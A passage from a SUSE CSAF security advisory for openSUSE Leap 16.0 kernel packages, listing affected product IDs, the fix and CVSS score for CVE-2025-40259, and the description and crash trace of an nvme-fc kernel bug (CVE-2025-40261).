"summary": "SUSE Bug 1254845 for CVE-2025-40259",
"url": "https://bugzilla.suse.com/1254845"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-40259"
},
{
"cve": "CVE-2025-40261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl()\n\nnvme_fc_delete_assocation() waits for pending I/O to complete before\nreturning, and an error can cause -\u003eioerr_work to be queued after\ncancel_work_sync() had been called. Move the call to cancel_work_sync() to\nbe after nvme_fc_delete_association() to ensure -\u003eioerr_work is not running\nwhen the nvme_fc_ctrl object is freed. Otherwise the following can occur:\n\n[ 1135.911754] list_del corruption, ff2d24c8093f31f8-\u003enext is NULL\n[ 1135.917705] ------------[ cut here ]------------\n[ 1135.922336] kernel BUG at lib/list_debug.c:52!\n[ 1135.926784] Oops: invalid opcode: 0000 [#1] SMP NOPTI\n[ 1135.931851] CPU: 48 UID: 0 PID: 726 Comm: kworker/u449:23 Kdump: loaded Not tainted 6.12.0 #1 PREEMPT(voluntary)\n[ 1135.943490] Hardware name: Dell Inc. PowerEdge R660/0HGTK9, BIOS 2.5.4 01/16/2025\n[ 1135.950969] Workqueue: 0x0 (nvme-wq)\n[ 1135.954673] RIP: 0010:__list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1135.961041] Code: c7 c7 98 68 72 94 e8 26 45 fe ff 0f 0b 48 c7 c7 70 68 72 94 e8 18 45 fe ff 0f 0b 48 89 fe 48 c7 c7 80 69 72 94 e8 07 45 fe ff \u003c0f\u003e 0b 48 89 d1 48 c7 c7 a0 6a 72 94 48 89 c2 e8 f3 44 fe ff 0f 0b\n[ 1135.979788] RSP: 0018:ff579b19482d3e50 EFLAGS: 00010046\n[ 1135.985015] RAX: 0000000000000033 RBX: ff2d24c8093f31f0 RCX: 0000000000000000\n[ 1135.992148] RDX: 0000000000000000 RSI: ff2d24d6bfa1d0c0 RDI: ff2d24d6bfa1d0c0\n[ 1135.999278] RBP: ff2d24c8093f31f8 R08: 0000000000000000 R09: ffffffff951e2b08\n[ 1136.006413] R10: ffffffff95122ac8 R11: 0000000000000003 R12: ff2d24c78697c100\n[ 1136.013546] R13: fffffffffffffff8 R14: 0000000000000000 R15: ff2d24c78697c0c0\n[ 1136.020677] FS: 0000000000000000(0000) GS:ff2d24d6bfa00000(0000) knlGS:0000000000000000\n[ 1136.028765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 1136.034510] CR2: 00007fd207f90b80 CR3: 000000163ea22003 CR4: 0000000000f73ef0\n[ 1136.041641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 1136.048776] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[ 1136.055910] PKRU: 55555554\n[ 1136.058623] Call Trace:\n[ 1136.061074] \u003cTASK\u003e\n[ 1136.063179] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.067540] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.071898] ? move_linked_works+0x4a/0xa0\n[ 1136.075998] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.081744] ? __die_body.cold+0x8/0x12\n[ 1136.085584] ? die+0x2e/0x50\n[ 1136.088469] ? do_trap+0xca/0x110\n[ 1136.091789] ? do_error_trap+0x65/0x80\n[ 1136.095543] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.101289] ? exc_invalid_op+0x50/0x70\n[ 1136.105127] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.110874] ? asm_exc_invalid_op+0x1a/0x20\n[ 1136.115059] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.120806] move_linked_works+0x4a/0xa0\n[ 1136.124733] worker_thread+0x216/0x3a0\n[ 1136.128485] ? __pfx_worker_thread+0x10/0x10\n[ 1136.132758] kthread+0xfa/0x240\n[ 1136.135904] ? __pfx_kthread+0x10/0x10\n[ 1136.139657] ret_from_fork+0x31/0x50\n[ 1136.143236] ? __pfx_kthread+0x10/0x10\n[ 1136.146988] ret_from_fork_asm+0x1a/0x30\n[ 1136.150915] \u003c/TASK\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
